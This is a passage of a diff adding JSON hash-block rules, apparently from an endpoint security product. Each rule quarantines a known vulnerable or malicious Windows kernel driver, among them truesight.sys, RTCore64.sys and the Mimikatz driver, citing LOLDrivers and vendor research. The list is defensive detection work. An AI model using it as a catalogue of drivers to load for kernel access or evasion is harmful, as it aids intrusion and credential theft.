"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26", + "comment": "Vulnerable Kernel Driver (aka Blackbone.sys) [https://www.loldrivers.io/drivers/b9b835bd-b720-424b-9160-2442bc4d6e58/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "76145b10-7db1-529f-8f28-c94951fae112", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979342Z", + "creation_date": "2026-03-23T11:45:29.979344Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979349Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6994b32e3f3357f4a1d0abe81e8b62dd54e36b17816f2f1a80018584200a1b77", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7616a600-1824-5b3e-87f4-6c3e8b65dda9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816834Z", + "creation_date": "2026-03-23T11:45:31.816838Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816846Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab47c98ad0fd5bd499a9b64e8697049658e4e7f4e3ac5573d6d776578749cc80", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "761eae45-3d62-5d71-8891-f4ba44272805", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610388Z", + "creation_date": "2026-03-23T11:45:29.610390Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610396Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "49329fa09f584d1960b09c1b15df18c0bc1c4fdb90bf48b6b5703e872040b668", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "76344f3f-8ead-5fef-8bae-1f4d73eff66f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605576Z", + "creation_date": "2026-03-23T11:45:29.605578Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605583Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "37a165ae09645763189c2a973475d744bf3897f267dcca673b6b57477d9f8b38", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "764892de-3027-5ee3-95c4-4f1603a45696", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154501Z", + "creation_date": "2026-03-23T11:45:31.154503Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154509Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a7e0b9e529533471060e5cd0f9fbed341d18225a58a12c6c13c615ae062cb1e5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "765e9e57-fd6e-5860-8839-d7751018ab24", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460152Z", + "creation_date": "2026-03-23T11:45:30.460155Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460164Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "96df0b01eeba3e6e50759d400df380db27f0d0e34812d0374d22ac1758230452", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "766256c7-dd82-57c9-beb8-0985e5a500b9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464006Z", + "creation_date": "2026-03-23T11:45:30.464009Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464018Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"36c65aeb255c06898ffe32e301030e0b74c8bca6fe7be593584b8fdaacd4e475", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "766b7dd5-d1d1-544e-b883-4d9cc4f4a7ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979653Z", + "creation_date": "2026-03-23T11:45:29.979655Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979663Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ff6108dd2017f9bc7ea93c43c1afbda0f1cc7b00f5afafb4ce3cf0a193e9598b", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "76844164-ac86-5ad3-aff5-58974bb72639", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:29.984303Z", + "creation_date": "2026-03-23T11:45:29.984305Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984310Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f8965fdce668692c3785afa3559159f9a18287bc0d53abb21902895a8ecf221b", + "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "769629b5-ebad-5c09-9c82-c7bb5df069c3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618807Z", + "creation_date": "2026-03-23T11:45:29.618808Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618814Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7680d9b4f66fe4fe9d4a45f2ebdb3f17e7d3e2519e0b61d691761a2222cf444b", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "769e350c-e261-5936-a125-4a39e839a3bc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480460Z", + "creation_date": "2026-03-23T11:45:31.480465Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480475Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "93e5d1ed74e874f2d17b24df51e55061cffdb9ea0226c4a41f38bbd43e97f18b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "76b2a15c-a747-5ad6-9011-3b8fbad5d476", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813758Z", + "creation_date": "2026-03-23T11:45:31.813760Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813765Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c84521ad34c174640e0ce2b640fad0acd48485167eedac86e3485b3768da946", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "76cfdb22-592f-55ed-8b53-159787a42f90", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970455Z", + "creation_date": "2026-03-23T11:45:29.970459Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970467Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f83d1913ba46517737c2667cb3652787523480347a12a5b69f8bdd2cb5242e49", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "76d06454-e42e-5a32-b674-19917bbccade", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816436Z", + "creation_date": "2026-03-23T11:45:30.816438Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816444Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "22901319d041f2650d1ade9a8f66f7e6993800d1c20e6014b7da6642d0e8d90e", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "76d5cca2-96ea-5a92-ba02-deb8f0eb9be4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612057Z", + "creation_date": "2026-03-23T11:45:29.612059Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612064Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + 
"type": "hash", + "value": "0c7809ac1fa074408518ddc0ac118912c9cd43ed9c89213bc4d59043016b040c", + "comment": "Vulnerable Kernel Driver (aka test2.sys) [https://www.loldrivers.io/drivers/6356d7d9-3b82-4731-9d5f-cc9bc37558fc/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "76d70b7b-6bd6-5527-95e7-eb8990ccc167", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975690Z", + "creation_date": "2026-03-23T11:45:29.975692Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975697Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c5647d315fb5ca1dcf4b063ea3f54003e2545739871519b8f2c98dc5baf66bac", + "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "76dfdd88-6c77-5e96-a6c7-0a658e17edb9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143113Z", + "creation_date": "2026-03-23T11:45:31.143114Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143120Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f7c82d65a8d7904e0581339770a14596b5a40fa1b24de8942b79006c05e11d6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "770ccf2e-a419-5f56-9c2c-568bd0aea266", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492521Z", + "creation_date": "2026-03-23T11:45:31.492523Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492529Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b50c9fa91866a60c381d7691f04ee27b190a65bda1f445abfe9e4e6d8e8c19d1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "771689b3-904f-5d20-86f8-1a8a44d0550a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835975Z", + "creation_date": "2026-03-23T11:45:30.835977Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835983Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cd07ce8faab0241f38ff052c0b3b204b4432b43c79bed23422f415fed668e132", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "771a29fa-88e5-5781-97be-6f5132e74d79", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.453402Z", + "creation_date": "2026-03-23T11:45:30.453405Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453415Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aeaafcb5d6a7f0354915c615bd0cf0e024168d17bd87d4dfe0bd60099482b4a4", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "771c28e8-4da4-5e50-b2aa-cdf38d259aff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812509Z", + "creation_date": "2026-03-23T11:45:31.812511Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812516Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2d7e5463bc619227af0b1700bcf487269d5fea0d2f4e9fdab496271110112cc5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"773c71f0-ef94-5d29-a59f-a479d431d04e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968332Z", + "creation_date": "2026-03-23T11:45:29.968334Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968339Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ebbaa44277a3ec6e20ad3f6aef5399fdc398306eb4c13aa96e45c9a281820a12", + "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7756f2a4-5d47-5fe3-a841-f11b39d64f3a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160276Z", + "creation_date": "2026-03-23T11:45:31.160280Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.160289Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "10d2d4f5810d9626ac57c4463810d4cf663bf7d03a0c0875a41df2dc86d57f93", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7757368c-56ac-5191-b1a5-2886c1831ec1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829237Z", + "creation_date": "2026-03-23T11:45:30.829239Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829245Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9c7c7d374576e95e93c1ddd70d2d879c56f3e34d7073164e9186aa6fc6431fea", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7758d1c7-64eb-5470-b886-46e0fcd62118", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
